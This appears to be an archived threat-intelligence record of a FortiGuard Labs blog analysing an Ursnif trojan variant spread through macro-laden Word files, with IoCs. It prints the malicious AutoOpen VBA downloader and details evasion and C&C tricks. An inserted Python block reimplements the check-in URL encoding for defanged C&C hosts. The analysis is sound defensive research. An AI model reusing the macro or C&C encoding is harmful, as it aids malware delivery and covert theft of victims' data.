{
	"id": "e8382400-4e67-48db-b109-b87f3a4cdf0a",
	"created_at": "2026-04-06T00:16:45.314789Z",
	"updated_at": "2026-04-10T03:22:13.60337Z",
	"deleted_at": null,
	"sha1_hash": "3d35f40f339daa3fb7e84a488ad5cfa617c5bca3",
	"title": "New Ursnif Variant Spreading by Word Document",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1265270,
	"plain_text": "New Ursnif Variant Spreading by Word Document\r\nBy Xiaopeng Zhang\r\nPublished: 2019-08-07 · Archived: 2026-04-05 18:40:53 UTC\r\nBreaking FortiGuard Labs Threat Research\r\nNOTE: This threat is actively spreading. During my analysis, which started with just a few samples, the volume of captured samples and the number of triggers this new variant set off in our global network of sensors kept growing. Because of this, we highly recommend that organizations stay alert to this currently expanding threat.\r\nRecently, FortiGuard Labs captured a number of Word documents from the wild that were spreading a new variant of the Ursnif trojan.\r\nI did some research on this new variant, and in this blog I will present what it does on a victim’s machine and what kinds of techniques it uses. The Ursnif trojan, also known as Dreambot, Gozi, and ISFB, has been alive for years and focuses on stealing information from a victim’s machine.\r\nWord Sample Analysis\r\nFigure 1. The Word sample content\r\nThese infected Word documents contain malicious VBA code. In this campaign, the file names of the Word documents follow the format “info_[date].doc”. The sample in this analysis is named info_07.25.doc.\r\nWhen a victim opens the Word document, Word displays the security warning that is meant to protect users from malicious macros (VBA code). However, the document content deceives victims into clicking the “Enable Content” button, as shown in Figure 1. 
When the button is clicked, the malicious VBA code is executed because it lives in an AutoOpen sub, which runs when the document is opened.\r\nThe malicious code is simple, as shown below (comments added for readability; the identifiers are the randomized names used by the sample):\r\n\r\nSub AutoOpen()\r\n    ' The UserForm named ymwsrw carries the payload in the Text properties of its controls\r\n    Set fPzzMCZTdBHCipC = ymwsrw\r\n    Set KiVsBKglbMn = fPzzMCZTdBHCipC.Controls\r\n    ' Concatenate the contents of control 2 and control 0: this yields the PowerShell command line\r\n    KKzPMDRPhZsJz = KiVsBKglbMn(2) + KiVsBKglbMn(0)\r\n    ' 100 - 90 - 9 = 1: control 1 holds the string passed to GetObject, which returns the COM object used below\r\n    Set PhFMwPKBcLcsm = VBA.GetObject(KiVsBKglbMn(100 - 90 - 9).Text)\r\n    ' Launch the assembled command through the Run method of that object\r\n    PhFMwPKBcLcsm.Run! KKzPMDRPhZsJz, 0 + 7596\r\nEnd Sub\r\n\r\nThe rest of the code is read from three controls on the UserForm named “ymwsrw”. The macro pieces the PowerShell code held in the controls’ Text properties together and executes it. Figure 2 shows how that PowerShell code is transformed.\r\nFigure 2. Executing the PowerShell code\r\nThe first part is the original PowerShell command line that the VBA code assembles. As you can see, it is Base64 encoded (-Enc is short for -EncodedCommand). After Base64 decoding, the code in the second part still contains Base64 encoded data. It decodes that data and then decompresses it to obtain the final PowerShell code in the bottom part of Figure 2.\r\nGoing through the final code, it downloads a file from a URL (underlined in red) into the “$Env:UserProfile” folder and eventually starts it by calling “[Diagnostics.Process]::STaRt($UpwpWW)”. Of course, results may vary, as the captured Word samples use many different URLs to download Ursnif.\r\nRegardless, the downloaded executable file is a variant of Ursnif, and the Word document sample is an Ursnif downloader.\r\nStart Downloaded Ursnif\r\nBy checking the downloaded file, we learned that it had been compiled on July 25th, 2019. 
When the downloaded executable starts, it dumps several dynamic code blocks into its memory and executes them. One of them is the main module that performs all of the Ursnif work.\r\nFigure 3. Extracted Ursnif Main module\r\nIn Figure 3, the data portion of the malware shows the file header of the decompressed main module. It is a little tricky here: the DOS magic word “MZ” that should appear in the first red rectangle is missing, and so is the PE header magic word “PE” that should be in the second rectangle. Ursnif removed these magic words so that the module is not identified as an executable, but Ursnif knows how to load the module without them. A practical consequence for defenders is that memory scanners and signatures that key on “MZ” or “PE” will not find this module; detection has to rely on the rest of the PE structure, such as the section table, or on behavior.\r\nIt then loads every section from the PE structure into newly allocated memory, repairs the relocation data, and resolves the API functions listed in the import table. When everything is ready, it calls the OEP (original entry point) of the main module. The process is just like what a packer does.\r\nAnti-Analysis in Main Module of Ursnif\r\nUrsnif uses a number of anti-analysis techniques to make it harder to analyze. For example, it hides some API functions, which are resolved dynamically each time they are called, so that static analysis is difficult; and most data in the “.bss” section of the main module’s PE structure is encrypted and only gets decrypted at runtime. Let’s take a look at the details.\r\nUrsnif registers a vectored exception handler by calling the API RtlAddVectoredExceptionHandler, whose second parameter points to the handler function. So, when it runs into any exception, the system calls this handler function first. Figure 4 shows the pseudo code for that.\r\nFigure 4. 
Register exception handler function\r\nUrsnif uses the exception handler function to decrypt the data in the “.bss” section. To do this, it sets the memory protection of the pages holding the “.bss” section, where the encrypted data lives, to PAGE_NOACCESS (0x1). Therefore, when Ursnif first reads data in this area, an access violation exception (exception code 0xC0000005) is raised and the exception handler function gets called; the handler decrypts the section and execution resumes.\r\nFigure 5 is a screenshot taken just after Ursnif has decrypted the data in the “.bss” section. The section is 0x1000 bytes in size. Most constant strings and API names are here, and they are used throughout Ursnif’s lifetime.\r\nFigure 5. Part of decrypted “.bss” data\r\nA number of key APIs are hidden in the main module. When it needs to call one, it calls a function named “API_Finder”, which dynamically loads the DLL the API belongs to and locates the API in it by calling LoadLibrary and then GetProcAddress.\r\nThe API names come from the decrypted “.bss” section, which holds a structure of strings and offsets; “API_Finder” locates an API name by its offset. Here is the ASM code snippet for using API_Finder to get the API “CloseClipboard” from “User32.dll”.\r\n\r\n000C9D27   sub_C9D27 proc near\r\n000C9D27    mov     eax, offset off_CC100\r\n000C9D2C    jmp     $+5\r\n000C9D31 loc_C9D31:\r\n000C9D31    push    ecx\r\n000C9D32    push    edx\r\n000C9D33    push    eax             ; API function index\r\n000C9D34    push    offset dword_CB2F4       ; dll name, 0CB150-> \"User32.dll\"\r\n000C9D39    call    API_Finder   ;It calls LoadLibrary and GetProcAddress. 
The API is in eax.\r\n000C9D3E    pop     edx\r\n000C9D3F    pop     ecx\r\n000C9D40    jmp     eax       ; calls the API function\r\n000C9D40 sub_C9D27 endp\r\n“API_Finder” obtains the API function index (0xCC100 here) from its second argument, from which it computes the offset of the string “CloseClipboard”. The first argument to “API_Finder” points to a structure holding the library name. The entry point of “CloseClipboard” is returned in “eax” and is finally called via the jmp.\r\nUsing a COM Instance to Send Data to the C&C\r\nIf you keep an eye on the process list in Task Manager while Ursnif runs, you will find many “iexplore.exe” processes that appear and disappear from time to time, and a lot of network traffic coming out of “iexplore.exe”. That is how Ursnif sends out the data collected from the victim’s system. It does not create the “iexplore.exe” process directly; COM (Component Object Model) does, because Ursnif creates a COM instance by calling the API “CoCreateInstance”, which is one of the hidden API functions. This is the ASM code snippet of the call.\r\n\r\n[…]\r\nseg000:000C3E0B                 jz      loc_C3E98\r\nseg000:000C3E11                 push    esi     ; ppv, receives the interface pointer\r\nseg000:000C3E12                 push    offset rrid ; {EAB22AC1-30C1-11CF-A7EB-0000C05BAE0B}\r\nseg000:000C3E17                 push    4       ; dwClsContext = CLSCTX_LOCAL_SERVER, hence the separate iexplore.exe process\r\nseg000:000C3E19                 push    0       ; pUnkOuter\r\nseg000:000C3E1B                 push    offset rclsid ; {0002DF01-0000-0000-C000-000000000046}\r\nseg000:000C3E20                 call    ds:CoCreateInstance\r\nseg000:000C3E26                 test    eax, eax\r\n[…]\r\nThe first argument is the GUID “{0002DF01-0000-0000-C000-000000000046}”, which is the CLSID of “Internet Explorer”. 
The fourth argument is an interface ID, “{EAB22AC1-30C1-11CF-A7EB-0000C05BAE0B}”, which is the IID of “IWebBrowser”. The COM object can also be created from the ProgID string “InternetExplorer.Application”.\r\nThe interface “IWebBrowser” exposes a variety of methods covering what you can do with the MS IE browser to access web sites, such as GoBack(), GoHome(), Navigate(), Refresh(), and so on. COM starts “iexplore.exe” and then hands back the “IWebBrowser” interface, whose methods are then ready to be called. Ursnif uses the Navigate() method, whose first argument is a URL string, to send the collected data to its C&C server. This also means the check-in traffic leaves the machine from a legitimate, signed browser process, which is worth remembering when hunting for it.\r\nUrsnif keeps compressed configuration data in the “.reloc” section of the main module. Decompressing it yields the data structure shown in Figure 6.\r\nFigure 6. Decompressed configuration data\r\nAt the bottom, you may notice that the C&C host list includes \"microsoft.com\", \"update.microsoft.com\", \"avast.com\", \"cdevinoucathrine.info\", \"zcei60houston.club\" and \"kenovella.club\". This seems odd. Why are the hosts of “microsoft” and “avast” listed here? In fact, this is a way to deceive researchers who capture and analyze the traffic: requests to the well-known domains are mixed in with the real C&C traffic.\r\nFigure 7. Format of collected information\r\nThe snippet of code in Figure 7 allows Ursnif to format the information collected from the victim’s system. One formatted string looks like this:\r\n\r\nsoft=3&version=214082&user=0364812000299edca18c7b9e8ed0ab6d&server=12&id=3387&crc=1&uptime=2193\r\n\r\n“soft” and “version” are constants.\r\n“user” is a sort of unique user ID. It consists of four DWORDs computed from a hash of the victim’s user name and computer name, as well as the CPU ID.\r\n“server” and “id” come from the decompressed configuration data. 
They are the values that follow the host strings in Figure 6, 3387 and 12.\r\n“crc” is another constant, 1.\r\n“uptime” is a time value that tells the attacker how long the victim’s system has been up.\r\nUrsnif encodes the above string with Base64 so that it can become part of a URL. It then replaces several bytes of the encoded string with their hex representation (for example, “+” becomes “_2B” and “/” becomes “_2F”). After that, it inserts a random number of “/” characters into the string and adds the prefix “/images/” and the suffix “.avi” to make the URL look normal.\r\nNow the collected data is almost ready to be sent to the C&C server. As I said before, there are six host strings in the decompressed configuration. Ursnif picks one of them and builds a complete URL from the host and the encoded string above. This URL is the first argument of the method \"IWebBrowser.Navigate()\". It moves on to the next host string after a 20 second wait. Below is an example of a URL that is sent to the C&C server.\r\n\r\nhxxps://cdevinoucathrine.info/images/SZmbQhNDM/NRU9kkrJ9pgbhJ0ElLjX/GmdR4KRmiqx7Vh8d_2B/e89HXjxRxOy7vuzb_2F1OAD3eZsE/D_2Fiv5c/ju_2Bs3XEZzWGZSfnBvVAvj/9xxBpMO3_2/BGf9ybUt5cslyUgIK/_2BnKRHLrDUUyi44DVzf/T.avi\r\n\r\nThis is the host list of C&C servers that I extracted from two variants:\r\nhxxps://cdevinoucathrine.info\r\nhxxps://zcei60houston.club\r\nhxxps://kenovella.club\r\nhxxps://z76johnson.club\r\nhxxps://s75eagtyec.com\r\nhxxps://s97pe2360.club\r\nSo far, these are all of my findings for this Ursnif variant. I will continue to monitor this campaign for more details.\r\nSolution:\r\nThis malicious Word document has been detected as “VBA/Agent.A329!tr.dldr” by the FortiGuard AntiVirus service. 
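For defenders who want to triage such URLs from proxy logs, the check-in encoding described in the C&C section above can be reproduced, and more usefully reversed, in a few lines. The following Python is an added example (not the post’s code and not the malware’s): it takes a constructed query string in the field layout quoted above, applies the steps the post lists (Base64, the “_2B” and “_2F” escapes, random “/” insertion, the “/images/” prefix and the “.avi” suffix), and decodes such a path back to its fields. One assumption beyond what the post states: the “=” padding character is escaped as “_3D” in the same style; the decoder also tolerates padding that was simply dropped. The host names are the ones listed in the post; the field values are made up.

```python
import base64
import random

# Constructed check-in string in the field layout quoted above (values made up).
SAMPLE_QUERY = ('soft=3&version=214082&user=0364812000299edca18c7b9e8ed0ab6d'
                '&server=12&id=3387&crc=1&uptime=2193')
# Hosts from the decompressed configuration; Ursnif walks them in turn.
SAMPLE_HOSTS = ['cdevinoucathrine.info', 'zcei60houston.club', 'kenovella.club']

# The escapes the post lists, plus '=' -> '_3D' (assumption, see the lead-in).
ESCAPES = (('+', '_2B'), ('/', '_2F'), ('=', '_3D'))
PREFIX = '/images/'
SUFFIX = '.avi'


def encode_checkin(query, rng, slash_rate=0.1):
    # Base64 the query, escape the characters that are not path-safe, then
    # sprinkle '/' separators so the result looks like a nested path.
    body = base64.b64encode(query.encode('ascii')).decode('ascii')
    for raw, esc in ESCAPES:
        body = body.replace(raw, esc)
    out = []
    for i, ch in enumerate(body):
        out.append(ch)
        if i < len(body) - 1 and rng.random() < slash_rate:
            out.append('/')
    return PREFIX + ''.join(out) + SUFFIX


def decode_checkin_path(url_or_path):
    # Reverse the encoding: drop scheme and host, prefix and suffix, and the
    # random '/', undo the escapes, re-pad, and Base64-decode. Returns bytes.
    path = url_or_path
    if '://' in path:
        path = path.split('://', 1)[1]
        path = path[path.find('/'):] if '/' in path else ''
    if not (path.startswith(PREFIX) and path.endswith(SUFFIX)):
        raise ValueError('not an Ursnif-style check-in path: ' + url_or_path)
    body = path[len(PREFIX):-len(SUFFIX)].replace('/', '')
    for raw, esc in ESCAPES:
        body = body.replace(esc, raw)
    body += '=' * (-len(body) % 4)
    return base64.b64decode(body)


def parse_fields(query):
    # 'k=v&k=v' -> dict; values stay strings.
    return dict(part.split('=', 1) for part in query.split('&') if '=' in part)


def parse_checkin(url_or_path):
    return parse_fields(decode_checkin_path(url_or_path).decode('ascii'))


def checkin_urls(hosts, path):
    # One URL per configured host; the post says the next host is tried after 20 s.
    return ['https://' + h + path for h in hosts]


def sample_path(seed=7):
    # Deterministic encoding of the constructed query, for demonstration.
    return encode_checkin(SAMPLE_QUERY, random.Random(seed))


if __name__ == '__main__':
    path = sample_path()
    for u in checkin_urls(SAMPLE_HOSTS, path):
        print(u)
    print(parse_checkin(checkin_urls(SAMPLE_HOSTS, path)[0]))
```

Applied to a URL captured from the wire, decode_checkin_path returns the raw bytes behind the Base64; whether they read as the soft=…&version=… string directly depends on nothing else having been applied before the Base64 step, which this post does not examine. The prefix/suffix check and the “_2B”/“_2F” escapes are also a usable proxy-log signature on their own.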
Besides antivirus detection, the CDR (Content Disarm & Reconstruction) feature in FortiGate and FortiMail can neutralize this threat by removing all malicious VBA code.\r\nThe downloaded file has been detected as “W32/Ursnif.AHSY!tr” by the FortiGuard AntiVirus service.\r\nThe URL used to download Ursnif has been rated as “Malicious Websites” by the FortiGuard WebFilter service.\r\nIoC:\r\nURL:\r\n\"hxxp://npkf32ymonica.com/sywo/fgoow.php?l=joow8.gxl\"\r\nSample SHA256:\r\ninfo_07.25.doc:\r\nAAA7758D75967D28847B3CB8A9B3E3032F31EC45D12C9904A7BC98C189726005\r\nDownloaded executable file:\r\nAAC9D2D21F634157EB8D3867A2C72042A83CABC3F0142B12763312F5A0B0A83A\r\nSource: https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html"
	],
	"report_names": [
		"ursnif-variant-spreading-word-document.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434605,
	"ts_updated_at": 1775791333,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3d35f40f339daa3fb7e84a488ad5cfa617c5bca3.pdf",
		"text": "https://archive.orkl.eu/3d35f40f339daa3fb7e84a488ad5cfa617c5bca3.txt",
		"img": "https://archive.orkl.eu/3d35f40f339daa3fb7e84a488ad5cfa617c5bca3.jpg"
	}
}